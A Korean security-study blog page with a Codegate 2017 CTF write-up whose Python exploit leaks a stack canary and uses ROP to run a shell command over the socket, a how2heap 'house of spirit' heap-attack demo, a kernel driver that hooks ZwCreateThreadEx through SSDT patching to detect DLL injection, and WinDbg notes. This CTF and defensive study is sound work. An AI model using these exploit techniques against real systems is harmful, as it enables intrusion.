'분류 전체보기' 카테고리의 글 목록 (6 Page)

[Codegate2017 Pre] BabyPwn

Write up/CTF 2017. 2. 11. 10:48

전형적인 bof 문제다 ROP 사용하면 해서 system 실행시키고

소켓으로 fd redirect 시켜서 플래그 확인해면 됌

아래는 Exploit.py

from pwn import *

con = remote("192.168.0.14", 9191) # local
#con = remote("110.10.212.130", 8888) # codegate

def dummy():
	con.recvn(276)

def canary_leak():
	print "[*] Canary Leak"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.send("1\x00")
	con.recvuntil("Input Your Message : ")
	con.sendline("A"*40)
	con.recvn(40)
	canary = con.recvn(4)[::-1]
	print "canary : " + hex(int(canary.encode("hex"), 16))
	return int(canary.encode("hex"), 16)

def ROP():
	canary = canary_leak()
	print "[*] ROP Stage"

	worker = 0x08048A71
	pop3ret = 0x8048eec
	system_plt = 0x8048620
	recv_plt = 0x80486e0
	bss = 0x804b1b4

	gadget = "/bin/ls 0>&4 1>&4\x00"

	print "[*] Pre-Payload Send"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.sendline("1")
	con.recvuntil("Input Your Message : ")

	payload  = ""
	payload += "A" * 40
	payload += p32(canary)
	payload += "B" * 12
	
	payload += p32(recv_plt)
	payload += p32(pop3ret)
	payload += p32(0x04) # socket
	payload += p32(bss)
	payload += p32(len(gadget))
	payload += p32(0x00)
	payload += p32(system_plt)
	payload += p32(0x41414141)
	payload += p32(bss)

	con.sendline(payload)

	print "[*] Canary Null Inject"
	con.recvuntil("3. Exit\n")
	con.recvuntil("===============================\n")
	con.sendline("1")
	con.recvuntil("Input Your Message : ")

	payload  = ""
	payload += "A" * 40
	payload += "\x00"

	con.send(payload)

	print "[*] Triggering"
	con.recvuntil("3. Exit\n")
	print con.recvuntil("===============================\n")
	con.sendline("3") # triggering

	con.sendline(gadget)

	con.interactive()

ROP()

'Write up > CTF' 카테고리의 다른 글

[RCTF 2017] RCalc (0)	2017.05.22
[Codegate2017 Pre] EasyCrack101 (0)	2017.02.11
[Codegate2017 Pre] BabyMISC (0)	2017.02.11
[RC3 2016] IMS-easy (150pt) *수정 (0)	2016.11.20
[CSAW_2014] Xorcise(Pwnable500) (0)	2016.07.30

KuroNeko_

KuroNeko

,

[행위기반탐지] kernel에서 프로세스 핸들로 PID구하기[ 삽질 1-2 완료 ]

Project 2017. 2. 2. 21:21

드디어 기본적인 틀은 다짰다.

이걸 어떻게 x64로 적용할지가 문제긴 한데 일단 x86을 먼저 시도해놨으니까 괜찮지 않을까 싶다.

ZwCreateThreadEx함수에서 ProcessHandle이 -1 이거나 커널영역의 핸들일 경우는 그냥 보내주고

아닐 때만 판별해낸다.

아래는 결과적으로 만든 드라이버 소스다.

#include <ntifs.h>

#pragma warning(disable: 4201)

typedef unsigned short WORD;
typedef unsigned char BYTE;

#define WP_MASK 0x0FFFEFFFF  //WP bit mask
#define SYSCALL_INDEX(_Func) *(PULONG) ((PUCHAR)_Func+1)
#define SYSTEM_SERVICE(_Func) KeServiceDescriptorTable.ServiceTableBase[SYSCALL_INDEX(_Func)]
#define SYSTEM_SERVICE_INDEX(Index) KeServiceDescriptorTable.ServiceTableBase[Index]
#define HOOK_SYSCALL(CurrentFunc, ChangeFunc) InterlockedExchange((PLONG)&SYSTEM_SERVICE(CurrentFunc), (LONG)ChangeFunc)
#define HOOK_SYSCALL_INDEX(Index, ChangeFunc) InterlockedExchange((PLONG)&SYSTEM_SERVICE_INDEX(Index), (LONG)ChangeFunc)

void writeCR0();
void readCR0();

NTSTATUS SetHookProc();
NTSTATUS SetUnHookProc();

NTSTATUS DriverEntry(
	IN PDRIVER_OBJECT DriverObject,
	IN PUNICODE_STRING RegistryPath
);

void UnloadRoutine(
	IN PDRIVER_OBJECT DriverObject
);

typedef unsigned int DWORD;
typedef unsigned int* LPDWORD;
typedef void* LPVOID;
typedef int BOOL;

#pragma pack(1)
typedef struct ServiceDescriptorEntry
{
	unsigned int *ServiceTableBase;
	unsigned int *ServiceCounterTableBase;
	unsigned int NumberOfServices;
	unsigned char *ParamTableBase;
} SSDT_ENTRY;
#pragma pack()

typedef struct _SYSTEM_THREADS_INFORMATION
{
	LARGE_INTEGER KernelTime;
	LARGE_INTEGER UserTime;
	LARGE_INTEGER CreateTime;
	ULONG WaitTime;
	PVOID StartAddress;
	CLIENT_ID ClientIs;
	KPRIORITY Priority;
	KPRIORITY BasePriority;
	ULONG ContextSwitchCount;
	ULONG ThreadState;
	KWAIT_REASON WaitReason;
}SYSTEM_THREADS_INFORMATION, *PSYSTEM_THREADS_INFORMATION;

typedef struct _SYSTEM_PROCESS_INFORMATION
{
	ULONG NextEntryDelta;
	ULONG ThreadCount;
	ULONG Reserved[6];
	LARGE_INTEGER CreateTime;
	LARGE_INTEGER UserTime;
	LARGE_INTEGER KernelTime;
	UNICODE_STRING ProcessName;
	KPRIORITY BasePriority;
	ULONG ProcessId;
	ULONG InheritedFromProcessId;
	ULONG HandleCount;
	ULONG Reserved2[2];
	VM_COUNTERS VmCounters;
	IO_COUNTERS IoCounters; //windows 2000 only
	SYSTEM_THREADS_INFORMATION Threads[1];
}SYSTEM_PROCESS_INFORMATION, *PSYSTEM_PROCESSES_INFORMATION;

EXTERN_C __declspec(dllimport) SSDT_ENTRY KeServiceDescriptorTable;

typedef NTSTATUS(*ZWCREATETHREADEX) (
	OUT PHANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes,
	IN HANDLE ProcessHandle,
	IN PVOID StartRoutine,
	IN OPTIONAL PVOID Argument,
	IN ULONG CreateFlags,
	IN OPTIONAL ULONG_PTR ZeroBits,
	IN OPTIONAL SIZE_T StackSize,
	IN OPTIONAL SIZE_T MaximumStackSize,
	IN OPTIONAL PVOID AttributeList
);

NTSTATUS ZwCreateThreadEx(
	OUT PHANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes,
	IN HANDLE ProcessHandle,
	IN PVOID StartRoutine,
	IN OPTIONAL PVOID Argument,
	IN ULONG CreateFlags,
	IN OPTIONAL ULONG_PTR ZeroBits,
	IN OPTIONAL SIZE_T StackSize,
	IN OPTIONAL SIZE_T MaximumStackSize,
	IN OPTIONAL PVOID AttributeList
);

typedef enum _SYSTEM_INFORMATION_CLASS {
	SystemBasicInformation,
	SystemProcessorInformation,
	SystemPerformanceInformation,
	SystemTimeOfDayInformation,
	SystemPathInformation,
	SystemProcessInformation,
	SystemCallCountInformation,
	SystemDeviceInformation,
	SystemProcessorPerformanceInformation,
	SystemFlagsInformation,
	SystemCallTimeInformation,
	SystemModuleInformation,
	SystemLocksInformation,
	SystemStackTraceInformation,
	SystemPagedPoolInformation,
	SystemNonPagedPoolInformation,
	SystemHandleInformation,
	SystemObjectInformation,
	SystemPageFileInformation,
	SystemVdmInstemulInformation,
	SystemVdmBopInformation,
	SystemFileCacheInformation,
	SystemPoolTagInformation,
	SystemInterruptInformation,
	SystemDpcBehaviorInformation,
	SystemFullMemoryInformation,
	SystemLoadGdiDriverInformation,
	SystemUnloadGdiDriverInformation,
	SystemTimeAdjustmentInformation,
	SystemSummaryMemoryInformation,
	SystemNextEventIdInformation,
	SystemEventIdsInformation,
	SystemCrashDumpInformation,
	SystemExceptionInformation,
	SystemCrashDumpStateInformation,
	SystemKernelDebuggerInformation,
	SystemContextSwitchInformation,
	SystemRegistryQuotaInformation,
	SystemExtendServiceTableInformation,
	SystemPrioritySeperation,
	SystemPlugPlayBusInformation,
	SystemDockInformation,
	SystemPowerInformation_,
	SystemProcessorSpeedInformation,
	SystemCurrentTimeZoneInformation,
	SystemLookasideInformation
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;

EXTERN_C NTKERNELAPI NTSTATUS NTAPI ZwQuerySystemInformation(
	_In_      SYSTEM_INFORMATION_CLASS SystemInformationClass,
	_Inout_   PVOID                    SystemInformation,
	_In_      ULONG                    SystemInformationLength,
	_Out_opt_ PULONG                   ReturnLength
);

EXTERN_C NTKERNELAPI NTSTATUS NTAPI ZwOpenProcess(
	OUT			PHANDLE				ProcessHandle,
	IN			ACCESS_MASK			DesiredAccess,
	IN			POBJECT_ATTRIBUTES	ObjectAttributes,
	IN OPTIONAL	PCLIENT_ID			ClientId
);

typedef struct _SYSTEM_HANDLE
{
	ULONG ProcessId;
	BYTE ObjectTypeNumber;
	BYTE Flags;
	USHORT Handle;
	PVOID Object;
	ACCESS_MASK GrantedAccess;
} SYSTEM_HANDLE, *PSYSTEM_HANDLE;

typedef struct _SYSTEM_HANDLE_INFORMATION
{
	ULONG HandleCount; /* Or NumberOfHandles if you prefer. */
	SYSTEM_HANDLE Handles[1];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;

#include "Hook.h"

#pragma warning(disable:4054) // casting-warning disable
#pragma warning(disable:4305) // casting-warning disable - high to low

void writeCR0(){
	__asm
	{
		push eax
		mov eax, CR0
		and eax, 0FFFEFFFFh
		mov CR0, eax
		pop eax
	};
}

void readCR0(){
	__asm
	{
		push eax
		mov eax, CR0
		or eax, NOT 0FFFEFFFFh
		mov CR0, eax
		pop eax
	};
}

ZWCREATETHREADEX OrgZwCreateThreadEx;

#define ZWCREATETHREADEX_INDEX 0x58

NTSTATUS ZwCreateThreadEx(
	OUT PHANDLE ThreadHandle,
	IN ACCESS_MASK DesiredAccess,
	IN OPTIONAL POBJECT_ATTRIBUTES ObjectAttributes,
	IN HANDLE ProcessHandle,
	IN PVOID StartRoutine,
	IN OPTIONAL PVOID Argument,
	IN ULONG CreateFlags,
	IN OPTIONAL ULONG_PTR ZeroBits,
	IN OPTIONAL SIZE_T StackSize,
	IN OPTIONAL SIZE_T MaximumStackSize,
	IN OPTIONAL PVOID AttributeList
	){
	DbgPrint("ZwCreateThreadEx(Hooked)");
	DbgPrint("Routine Address : %p", StartRoutine);

	if ((DWORD)ProcessHandle == 0xffffffff || (DWORD)ProcessHandle >= 0x80000000){
		DbgPrint("Call Original ZwCreateThreadEx");
		return OrgZwCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle,
			StartRoutine, Argument, CreateFlags, ZeroBits, StackSize, MaximumStackSize, AttributeList);
	}
	else{
		ULONG dum, dum2;
		SYSTEM_HANDLE_INFORMATION dummy = { 0, };
		NTSTATUS result = ZwQuerySystemInformation(SystemHandleInformation, &dummy, sizeof(SYSTEM_HANDLE_INFORMATION), &dum);

		PVOID *proc = NULL;
		DWORD pid = 0xffffffff;
		if (result == STATUS_INFO_LENGTH_MISMATCH){
			proc = ExAllocatePoolWithTag(NonPagedPool, dum, 'GETK');
			if (proc){
				result = ZwQuerySystemInformation(SystemHandleInformation, proc, dum, &dum2);
				
				SYSTEM_HANDLE_INFORMATION *ptr = (SYSTEM_HANDLE_INFORMATION *)proc;
				for (ULONG idx = 0; idx < ptr->HandleCount; idx++){
					if (ptr->Handles[idx].Handle == (USHORT)ProcessHandle &&
						ptr->Handles[idx].ObjectTypeNumber == 7){ // 7 : process
						
						pid = ptr->Handles[idx].ProcessId;
						break;
					}
				}
				ExFreePool(proc);
			}
			else{
				result = STATUS_UNSUCCESSFUL;
				return result;
			}
		}
		else if (NT_SUCCESS(result)){
			proc = &dummy;
			DbgPrint("ZwQuerySystemInformation Success!");
			SYSTEM_HANDLE_INFORMATION *ptr = (SYSTEM_HANDLE_INFORMATION *)proc;
			DbgPrint("Find pid from handle..");
			for (ULONG idx = 0; idx < ptr->HandleCount; idx++){
				DbgPrint("PID : %p", ptr->Handles[idx].Handle);
				if ((HANDLE)ptr->Handles[idx].Handle == ProcessHandle){
					DbgPrint("Successfully done.");
					pid = ptr->Handles[idx].ProcessId;
					break;
				}
			}
		}

		SYSTEM_PROCESS_INFORMATION dummy2 = { 0, };
		result = ZwQuerySystemInformation(SystemProcessInformation, &dummy2, sizeof(SYSTEM_PROCESS_INFORMATION), &dum);
		if (result == STATUS_INFO_LENGTH_MISMATCH){
			proc = ExAllocatePoolWithTag(NonPagedPool, dum, 'GETK');
			result = ZwQuerySystemInformation(SystemProcessInformation, proc, dum, &dum2);
			if (NT_SUCCESS(result)){
				SYSTEM_PROCESS_INFORMATION *ptr = (SYSTEM_PROCESS_INFORMATION *)proc;

				for (; ptr; ptr = (SYSTEM_PROCESS_INFORMATION *)((char *)ptr + (ULONG)ptr->NextEntryDelta)){
					if (pid == ptr->ProcessId){
						PEPROCESS eProcess;
						result = PsLookupProcessByProcessId((HANDLE)pid, &eProcess);
						if (NT_SUCCESS(result)){
							PVOID argu = NULL;
							KAPC_STATE apc_state;
							KeStackAttachProcess(eProcess, &apc_state);

							argu = ExAllocatePoolWithTag(NonPagedPool,strlen(Argument) + 1, 'GETK');
							if (argu == NULL)
								return STATUS_UNSUCCESSFUL;

							RtlCopyMemory(argu, Argument, strlen(Argument));

							KeUnstackDetachProcess(&apc_state);

							if (strstr((const char *)tolower((int)argu), ".dll") != NULL){ // DLL 파일이면
								ExFreePool(argu);
								return OrgZwCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle,
									StartRoutine, NULL, CreateFlags, ZeroBits, StackSize, MaximumStackSize, AttributeList);
							}

							ExFreePool(argu);
							return OrgZwCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle,
								StartRoutine, Argument, CreateFlags, ZeroBits, StackSize, MaximumStackSize, AttributeList);
						}
					}
				}
			}
			if (proc)
				ExFreePool(proc);
			return STATUS_SUCCESS;
		}
		else if (NT_SUCCESS(result)){
			SYSTEM_PROCESS_INFORMATION *ptr = (SYSTEM_PROCESS_INFORMATION *)&dummy2;
			for (; ptr; ptr = (SYSTEM_PROCESS_INFORMATION *)((char *)ptr + (ULONG)ptr->NextEntryDelta)){
				if (pid == ptr->ProcessId){
					PEPROCESS eProcess;
					result = PsLookupProcessByProcessId((HANDLE)pid, &eProcess);
					if (NT_SUCCESS(result)){
						PVOID argu = NULL;
						KAPC_STATE apc_state;
						KeStackAttachProcess(eProcess, &apc_state);

						argu = ExAllocatePoolWithTag(NonPagedPool, strlen(Argument) + 1, 'GETK');
						if (argu == NULL)
							return STATUS_UNSUCCESSFUL;

						RtlCopyMemory(argu, Argument, strlen(Argument));

						KeUnstackDetachProcess(&apc_state);

						if (strstr((const char *)tolower((int)argu), ".dll") != NULL){ // DLL 파일이면
							ExFreePool(argu);
							return OrgZwCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle,
								StartRoutine, NULL, CreateFlags, ZeroBits, StackSize, MaximumStackSize, AttributeList);
						}

						ExFreePool(argu);
						return OrgZwCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle,
							StartRoutine, Argument, CreateFlags, ZeroBits, StackSize, MaximumStackSize, AttributeList);
					}
				}
			}
		}

		return STATUS_UNSUCCESSFUL;
	}
}

NTSTATUS SetHookProc(){
	DbgPrint("SetHookProc() Routine");
	writeCR0();

	OrgZwCreateThreadEx = (ZWCREATETHREADEX)SYSTEM_SERVICE_INDEX(ZWCREATETHREADEX_INDEX);

	HOOK_SYSCALL_INDEX(ZWCREATETHREADEX_INDEX, ZwCreateThreadEx);

	readCR0();
	return STATUS_SUCCESS;
}

NTSTATUS SetUnHookProc(){
	writeCR0();

	HOOK_SYSCALL_INDEX(ZWCREATETHREADEX_INDEX, OrgZwCreateThreadEx);

	readCR0();
	return STATUS_SUCCESS;
}

void UnloadRoutine(IN PDRIVER_OBJECT DriverObject){
	UNREFERENCED_PARAMETER(DriverObject);
	DbgPrintEx(DPFLTR_IHVDRIVER_ID, DPFLTR_INFO_LEVEL, "Unloaded\n");
	SetUnHookProc();
}

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath){
	UNREFERENCED_PARAMETER(RegistryPath);

	DbgPrint("DriverEntry!");
	DbgPrint("DriverObject Unload Function Setting");
	DriverObject->DriverUnload = UnloadRoutine;
	
	SetHookProc();

	return STATUS_SUCCESS;
}

'Project' 카테고리의 다른 글

[Git] Gitolite 설치 (0)	2017.03.21
[행위기반탐지] 주저리1 (커널 드라이버와 통신) (0)	2017.03.03
[행위기반탐지] 삽질2 (0)	2017.02.01
[행위기반탐지] 삽질 1 (0)	2017.01.31
[행위기반탐지] ZwCreateThreadEx 의 인자 분석 ( 32bit ) (0)	2017.01.30

KuroNeko_

KuroNeko

,

[행위기반탐지] 삽질2

Project 2017. 2. 1. 22:51

어제 말했던 건 한 90정도는 된거 같은데 문제가 있다,

커널 함수을 모르니까 내가 원하는 방식으로 되질않는다.

분명 HANDLE 가지고 PID를 구하거나 반대도 될 텐데.. 어떻게 해야할지 구글링해도 자세히 안나와 있고

DbgPrint만 더럽게 사용하고 있다.

일단 내일도 한번 삽질 계속 해봐야지

공부 중인 링크

http://driverentry.tistory.com/entry/%ED%8E%8C-HANDLE%EC%97%90-%EB%8C%80%ED%95%9C-%ED%83%90%EA%B5%AC-%EC%B2%AB%EB%B2%88%EC%A7%B8-%EC%8B%9C%EA%B0%84

'Project' 카테고리의 다른 글

[행위기반탐지] 주저리1 (커널 드라이버와 통신) (0)	2017.03.03
[행위기반탐지] kernel에서 프로세스 핸들로 PID구하기[ 삽질 1-2 완료 ] (0)	2017.02.02
[행위기반탐지] 삽질 1 (0)	2017.01.31
[행위기반탐지] ZwCreateThreadEx 의 인자 분석 ( 32bit ) (0)	2017.01.30
[Project] Console Web (0)	2016.05.18

KuroNeko_

KuroNeko

,

Windbg 명령어

자료 2017. 1. 31. 22:33

WinDbg 명령어정리

Command	option	Desc
종료
q		디버깅 종료
qd		디버깅 종료;연결해제 – User-mode : Target Application은 종료되지 않는다. – Kernel-mode : Debugee OS는 Pending되지 않고 계속해서 동작한다.
디버깅 환경정보
vertarget		타겟 컴퓨터 정보 표시
version		디버그 환경 정보 표시
.lastevent		마지막 디버그 이벤트 정보 표시
\|\|		디버깅 세션 정보 표시
symble & sorurce
.symfix		MS 심볼경로 설정
.sympath		심볼경로 확인/설정
!sym noisy		심볼파일 검색 과정을 출력
!sym quiet		심볼파일 검색 과정을 출력하지 않음
.srcpath	.srcpath+ d:\project	소스경로 설정
.srcnoisy	.srcnoisy 1	소스경로 검색 과정을 출력
모듈
lm		로드된 모듈 표시
	lm m nt*	패턴과 일치되는 모듈 표시
	v	모듈 상세정보 표시
!lmi	!lmi ntdll.dll	모듈 상세정보 표시
.reload	/f test.sys	심볼을 즉시 로드
	/i test.sys	TimeStamp가 맞지 않아도 강제로 심볼 로드
	/user	[kd] User symbol load
x	x nt!* x !abc* x /v nt!NtCreateFile x /t nt!NtCreateFile x /n nt!ntCreate*	심볼 타입을 표시. 데이터 타입을 표시 이름순으로 정렬
ln	ln [address]	해당 주소에 근접한 심볼의 정보 표시
!dh	!dh [Option] Address -f Display file headers -s Display Section Headers -a Display all header nformation	displays the headers for the specified image
레지스터
r		레지스터 정보 표시
r $proc		현재 프로세스의 PEB주소( user-mode) 현재 프로세스의 EPROCESS주소( kernel-mode)
r $thread		현재 스레드의 TEB주소( user-mode) 현재 스레드의 ETHREAD주소( kernel-mode)
r $tpid		현재 프로세스 ID(PID)
r $tid		현재 스레드 ID(TID)
언어셈블
u	f b	언어셈블 언어셈블(함수전체) 언어셈블(ip이전의 8개 명령어)
콜스택
k	[n] p b n v f	콜스택 정보표시 함수정보 출력 인자표시 프레임번호 FPO정보 표시 스택 사용량 표시
break point
bp	bp 0x123456	bp 설정
bl		bp 리스트 출력
bc	bc * \| [frame_no]	bp 삭제
bd,be	bd * \| [frame_no]	bp disable/enable
bm	bm notepad!Win	패턴과 일치하는 모든심볼에 bp설정
bu	bu aaa!bbb	로드되지 않은 심볼에 대한 bp설정
ba		특정 주소에 access시 bp
지역변수
dv	dv modulr!test* /i /V	심볼유형과 인자유형 표시 변수저장 위치 표시( register or address )
데이터유형
dt	df _EPROCESS 0xaddr dt _PEB @$peb	주소를 특정 데이터 형으로 변환해서 표시 Current Process PEB정보 디스플레이
du dpu		Unicode string 표시
da dpa		Ansi string 표시
dc
db
dy

!address	!address !address [address]
dds	dds [Options] [Range] dds esp esp+100	Display Words and Symbols esp 부터 esp+100까지의 값을 출력 - callstack이 깨진경우, stack확인의 용도로 사용할 수 있다
프로세스 & 스레드 정보
!peb		PEB(Process Environment Block)표시
!teb		TEB(Thread Environment Block) 표시
~*kb		모든 thread의 콜스택 표시
!gle		API의 마지막 에러코드 표시
실행 제어
t		Trace
~.t		다른 스레드를 중지시킨 상태에서 하나의 statementt 실행
g
p		Step Over
gu	gu ~0 gu	현재함수가 복귀할 때 까지 실행 스레드 0을 제외한 모든 스레드를 freeze함
wt	-oR	내부에서 호출된 함수와 함수호출 횟수등의 정보 표시 (특정 API 내부에서 호출되는 함수와 결과를 한눈에 확인 할 수 있다.)
.cxr		컨텍스트 변경
!ready
.thread
!thread
.trap
.process
!process
ed
eb	eb .-6 90 90 90 90 90 90	6byte를 NOP(0x90)으로 변경
!error	!error [error code]	에러코드 정보표시


Set Exceptions
sxe	sxe av(0xc0000005) sxe ld:[moduleName] sxe ud:[moduleName]	Set Exceptions Break when access violation Break when [module] load Break when [module] unlod
sxd	sxd av	Disable Break when av(first chance)
Create Dump
.dump	/f full user-mode dump /m minidump /u Append date,time,PID	Create Dump File
.writemem	.writemem FileName Range : Range – BaseAddr L”DumpSize” .writemem c:\a.dll 0x00030000 L28000	writes a section of memory to a file
WinDBG 설정
.lines -e		라인정보 표시
.enable_unicode 1		Watch, local변수 창에 유니코드 표시
ed Kd_DEFAULT_MASK 8		Vista이상: DbgPrint출력 활성화

펌 : http://thepassion.tistory.com/114

'자료' 카테고리의 다른 글

[Ubuntu] upgrade시 용량부족으로 인한 문제 해결 (0)	2017.10.12
[Library] vcpkg (0)	2017.07.26
[펌] 동적 메모리 관리 (0)	2016.12.26
[Heap] how2heap (shellpish) (0)	2016.12.25
[Linux] rootkit 자료 (펌) (0)	2016.11.30

KuroNeko_

KuroNeko

,

[행위기반탐지] 삽질 1

Project 2017. 1. 31. 22:29

오늘 역시 삽질을 해버렸다.

내가 처음 구현했던 방식은 이전 게시글을 바탕으로 아예 CreateRemoteThread를 막아버리는 거였는데,

그렇게 하면 ZwCreateRemoteThread 함수로 Wrapping되어있기 때문에 판별하는 방법이 한정된다.

그래서 나는 아래와 같은 코드로 구현을 해봤었다.

if ((DWORD)ProcessHandle == 0xffffffff){
	DbgPrint("Call Original ZwCreateThreadEx");
	return OrgZwCreateThreadEx(ThreadHandle, DesiredAccess, ObjectAttributes, ProcessHandle,
			StartRoutine, Argument, CreateFlags, ZeroBits, StackSize, MaximumStackSize, AttributeList);
}

return STATUS_UNSUCCESSFUL;

하지만 어째선지 다른 RTL 계 함수들이 호출되는 걸 볼 수 있었고, 나중에는 결국 뻑 나가게 된다.

그래서 그냥 Argument 안에 .dll이 있는지 없는지만 검사를 해서 넘겨줬지만,

그마저도 RemoteThread에서 다른 프로세스의 값을 읽어야되는 상태가 되버려서 뻑 나가게 되버렸다.

결국 나는 아래와 같이 구현하려고 생각한다.

먼저 ZwQuerySystemInformation 함수를 호출해서 해당 인젝션 당하는 프로세스의 정보를 얻어와

PsLookupProcessByProcessId 함수를 통해 EPROCESS를 얻어온다.

그 EPROCESS를 기반으로 그 프로세스를 Attach해서 인자값을 읽어와 .dll이 포함되있다면 무시하도록 한다.

결론, 아직 구현은 못했다 내일 아마 해야할듯;;

아 참, 커널에서 힙을 할당하는 건 ExAllocatePool를 사용하면 된다.

ex)

PVOID proc = ExAllocatePool(NonPagedPool, sizeof(struct _SYSTEM_PROCESSES) * 10);

'Project' 카테고리의 다른 글

[행위기반탐지] kernel에서 프로세스 핸들로 PID구하기[ 삽질 1-2 완료 ] (0)	2017.02.02
[행위기반탐지] 삽질2 (0)	2017.02.01
[행위기반탐지] ZwCreateThreadEx 의 인자 분석 ( 32bit ) (0)	2017.01.30
[Project] Console Web (0)	2016.05.18
[Project] Interpret Nyan (0)	2016.03.13

KuroNeko_

KuroNeko

,

[행위기반탐지] ZwCreateThreadEx 의 인자 분석 ( 32bit )

Project 2017. 1. 30. 14:17

최근 간단하게 행위 기반 탐지로 프로젝트를 잡고 구현중에 있는데,

처음 진행할 건 DLL Injection을 막는 것, 이건 32bit 환경에선 SSDT 후킹을 통해서 진행하려고 한다.

별 다른건 없으니 진행하도록 하겠다.

DLL Injection을 탐지하는 방법을 생각해본 결과 아래와 같이 4가지 정도가 있었다.

1. CreateRemoteThread, WriteProcessMemory 등의 함수 글로벌 후킹

2. IDT 참조 후 실제 프로세스에서 사용중인 DLL과 비교

3. 현재 로딩된 DLL을 리스트로 잡아놓고 비교

4. SSDT 후킹으로 ZwCreateThreadEx 변경

현재 2, 3번은 구현을 완료했고 별건 없었다.

1번도 간단하게 제작 가능하다만, 문제는 4번이였다.

스레드를 생성하는 함수는 CreateThread(Ex), CreateRemoteThread(Ex) 이런게 있는데

CreateThread나 CreateRemoteThread나 각각 Ex함수로 Wrapping되버리고

Ex함수들은 ZwCreateThreadEx함수를 호출하게 된다.

CreateThread가 CreateThreadEx로 Wrapping되버려 Ex의 다른 인자값인 다른 프로세스의 핸들이 없다.

그 때문에 0xFFFFFFFF 로 넣어주고 호출해준다.

CreateRemoteThread는 핸들이 있으니 그 핸들을 넣어주고 호출해줌.

'Project' 카테고리의 다른 글

[행위기반탐지] 삽질2 (0)	2017.02.01
[행위기반탐지] 삽질 1 (0)	2017.01.31
[Project] Console Web (0)	2016.05.18
[Project] Interpret Nyan (0)	2016.03.13
Project_1 :: iptime 펌웨어 뜯어보기 (1)	2014.11.21

KuroNeko_

KuroNeko

,

[C++] 프로그램 관리자 권한 요구

공부 2017. 1. 4. 22:13

프로젝트 속성 - 링커 - 매니페스트 파일 - UAC 실행 수준

requireAdministrator로 변경

'공부' 카테고리의 다른 글

GCC Stack Boundary (0)	2017.04.27
정보보안기사 정리 (0)	2017.04.20
[how2heap] house_of_spirit (0)	2016.12.28
[how2heap] unsafe unlink (0)	2016.12.26
[how2heap] fast bin dup into stack (0)	2016.12.25

KuroNeko_

KuroNeko

,

[how2heap] house_of_spirit

공부 2016. 12. 28. 22:38

#include <stdio.h>
#include <stdlib.h>

int main()
{
	printf("This file demonstrates the house of spirit attack.\n");

	printf("Calling malloc() once so that it sets up its memory.\n");
	malloc(1);

	printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
	unsigned long long *a;
	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

	printf("This region must contain two chunks. The first starts at %p and the second at %p.\n", &fake_chunks[1], &fake_chunks[7]);

	printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
	printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
	fake_chunks[1] = 0x40; // this is the size

	printf("The chunk.size of the *next* fake region has be above 2*SIZE_SZ (16 on x64) but below av->system_mem (128kb by default for the main arena) to pass the nextsize integrity checks .\n");
	fake_chunks[9] = 0x2240; // nextsize

	printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
	printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
	a = &fake_chunks[2];

	printf("Freeing the overwritten pointer.\n");
	free(a);

	printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
	printf("malloc(0x30): %p\n", malloc(0x30));
}

정리.

stack이나 bss영역이나 쓰기가능 한 곳에 fake청크를 만들어서 ptr를 덮어씌워 free시키면 free list에 주소가 저장되므로

다음 malloc때 해당 영역에 할당되게 된다.

'공부' 카테고리의 다른 글

정보보안기사 정리 (0)	2017.04.20
[C++] 프로그램 관리자 권한 요구 (0)	2017.01.04
[how2heap] unsafe unlink (0)	2016.12.26
[how2heap] fast bin dup into stack (0)	2016.12.25
[how2heap] fastbin dup (0)	2016.12.25

KuroNeko_

KuroNeko

,

'Study'에 해당되는 글 147건

[Codegate2017 Pre] BabyPwn

'Write up > CTF' 카테고리의 다른 글

[행위기반탐지] kernel에서 프로세스 핸들로 PID구하기[ 삽질 1-2 완료 ]

'Project' 카테고리의 다른 글

[행위기반탐지] 삽질2

'Project' 카테고리의 다른 글

Windbg 명령어

'자료' 카테고리의 다른 글

[행위기반탐지] 삽질 1

'Project' 카테고리의 다른 글

[행위기반탐지] ZwCreateThreadEx 의 인자 분석 ( 32bit )

'Project' 카테고리의 다른 글

[C++] 프로그램 관리자 권한 요구

'공부' 카테고리의 다른 글

[how2heap] house_of_spirit

'공부' 카테고리의 다른 글

공지사항

카테고리

태그목록

글 보관함

달력

링크

KuroNeko_

LATEST FROM OUR BLOG

LATEST COMMENTS

BLOG VISITORS

티스토리툴바

« 2025/02 »
일	월	화	수	목	금	토
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28